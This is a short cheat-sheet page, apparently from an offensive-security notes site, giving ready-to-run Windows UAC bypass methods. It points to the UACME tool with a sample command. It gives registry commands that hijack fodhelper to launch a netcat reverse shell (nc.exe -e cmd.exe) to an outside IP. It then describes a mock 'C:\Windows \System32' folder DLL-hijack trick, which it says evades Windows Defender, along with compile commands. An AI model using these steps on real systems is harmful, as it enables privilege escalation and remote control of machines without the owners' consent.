UAC Bypass

UACME

Akagi-UACME will %99 be a win here

https://github.com/hfiref0x/UACME

akagi64 61 c:\windows\system32\cmd.exe

Technique 1

https://twitter.com/xxByte/status/1381978562643824644

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

Now simply type "fodhelper" and you should have the shell.

To undo this,

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technique 2

This technique is pretty solid and does not get detected by the windows defender

TLDR; you can fool windows by creating a folder called c:\windows \System32\ you can put a windows binary(auto elevated ones) there and hijack dlls. There is a full list of hijackable binaries here,

https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows

mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"

You might need to compile your binary in 64bit arch

# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp

PreviousMiscellaneous NextExploits

Last updated 3 years ago

hashtagUACME

hashtagTechnique 1

hashtagTechnique 2

UACME

Technique 1

Technique 2